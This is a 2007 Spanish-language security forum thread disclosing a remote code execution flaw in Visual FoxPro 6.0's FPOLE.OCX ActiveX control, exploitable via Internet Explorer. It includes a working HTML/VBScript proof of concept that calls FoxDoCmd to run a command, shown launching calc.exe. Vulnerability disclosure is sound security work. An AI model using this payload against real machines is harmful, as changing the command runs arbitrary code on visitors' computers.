elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 18:53  


Tema destacado: [AIO elhacker.NET] Compilación herramientas análisis y desinfección malware

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Microsoft Visual FoxPro 6.0 (FPOLE.OCX): Ejecución remota de código arbitrario		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Microsoft Visual FoxPro 6.0 (FPOLE.OCX): Ejecución remota de código arbitrario  (Leído 3,360 veces)
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Microsoft Visual FoxPro 6.0 (FPOLE.OCX): Ejecución remota de código arbitrario
« en: 10 Octubre 2007, 21:03 »
Citar

   Microsoft Visual FoxPro 6.0 (FPOLE.OCX): Ejecución remota de código arbitrario mediante IE
   
     [Descripción]

        Microsoft Visual FoxPro, paquete usualmente del gran conocido Microsoft Visual Studio, es propenso
        a un fallo de seguridad, debido a un mal diseño en la libreria FPOLE.OCX, más concretamente en el
        método FoxDoCmd, que permite la ejecución, tanto local como remota, de código arbitrario en
        el ordenador del usuario.

        La explotación se lleva a cabo mediante la visualización de la página Web maliciosa con el
        navegador Internet Explorer.
      
     [Versiones afectadas]
        - FPOLE.OCX Version: 6.0.8450.0 - MD5: E9A1D8CFE6C791BA76B7343FA39752FB
      
     [Enlaces]

        - Advisory: http://shinnai.altervista.org/exploits/txt/TXT_14md9AHOoCycrnk9l095.html
En línea
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Microsoft Visual FoxPro 6.0 (FPOLE.OCX): Ejecución remota de código arbitrar
« Respuesta #1 en: 10 Octubre 2007, 21:04 »
Código
  <object id="poc" classid="clsid:EF28418F-FFB2-11D0-861A-00A0C903A97F" width="1" height="1"></object>
 
  <input language="VBScript" onClick="tryMe()" type="button" value="Pincha aquí para iniciar la prueba">
 
  <script language="VBScript">
    Sub tryMe
      poc.FoxDoCmd "RUN cmd.exe /c calc.exe", "Something"
    End Sub
  </script>
En línea
Airle

Desconectado Desconectado

Mensajes: 10


Ver Perfil
Re: Microsoft Visual FoxPro 6.0 (FPOLE.OCX): Ejecución remota de código arbitrar
« Respuesta #2 en: 11 Octubre 2007, 12:23 »
Excelente.. muchas gracias.. ;D
En línea
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Microsoft Visual FoxPro 6.0 (FPOLE.OCX): Ejecución remota de código arbitrar
« Respuesta #3 en: 12 Octubre 2007, 17:05 »
Se agradece ese tipo de comentarios, muchas gracias :).
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ejecución de código arbitrario en ClamAV
Noticias 		wolfbcn 1 605 Último mensaje 25 Febrero 2011, 14:56
por Gurowner
Vulnerabilidad en pila Bluetooth de Microsoft 2.1 [ejecución remota de código]
Hacking Mobile 		ANELKAOS 0 1,091 Último mensaje 13 Julio 2011, 13:02
por ANELKAOS
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines